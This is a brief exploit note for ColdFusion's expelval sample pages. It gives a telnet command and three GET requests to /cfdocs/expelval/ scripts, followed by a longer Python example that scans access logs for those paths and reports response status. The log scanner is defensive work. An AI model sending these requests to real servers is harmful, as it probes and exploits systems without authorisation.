Exploit:

 telnet target.machine.com 80

  GET /cfdocs/expelval/openfile.cfm HTTP/1.0
  GET /cfdocs/expelval/exprcalc.cfm HTTP/1.0
  GET /cfdocs/expelval/displayopenedfile.cfm HTTP/1.0
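
To check whether the three paths above have been requested on a server you run, this added example (not part of the original page) scans access log lines for them and reports the response status. It assumes Common Log Format and that matching should be case-insensitive after percent-decoding; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths copied from the requests listed above.
WATCHED = {
    "/cfdocs/expelval/openfile.cfm",
    "/cfdocs/expelval/exprcalc.cfm",
    "/cfdocs/expelval/displayopenedfile.cfm",
}

# Assumed log layout (Common Log Format):
# host ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+'
)

def normalize(target):
    """Reduce a request target to a comparable lower-case path."""
    path = target.split("?", 1)[0]          # drop the query string
    for _ in range(3):                      # also catches double encoding (%252f)
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/").lower()  # assumption: case-insensitive server
    return re.sub(r"/+", "/", path)         # collapse repeated slashes

def find_hits(lines):
    """Return (host, time, path, status) for each request to a watched path."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if m and normalize(m.group("target")) in WATCHED:
            hits.append((m.group("host"), m.group("time"),
                         normalize(m.group("target")), int(m.group("status"))))
    return hits

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /cfdocs/expelval/openfile.cfm HTTP/1.0" 200 1532',
    '192.0.2.10 - - [01/Jan/2000:10:00:05 +0000] "GET /CFDOCS/expelval/ExprCalc.cfm?x=1 HTTP/1.0" 404 210',
    '192.0.2.11 - - [01/Jan/2000:10:01:00 +0000] "GET /cfdocs/expelval%2Fdisplayopenedfile.cfm HTTP/1.0" 200 880',
    '192.0.2.12 - - [01/Jan/2000:10:02:00 +0000] "GET /index.html HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for host, when, path, status in find_hits(SAMPLE):
        print(f"{when} {host} {path} -> {status}")
```

A 200 status on any hit means the page is present and reachable from the requesting host; a 404 still records that someone asked for it.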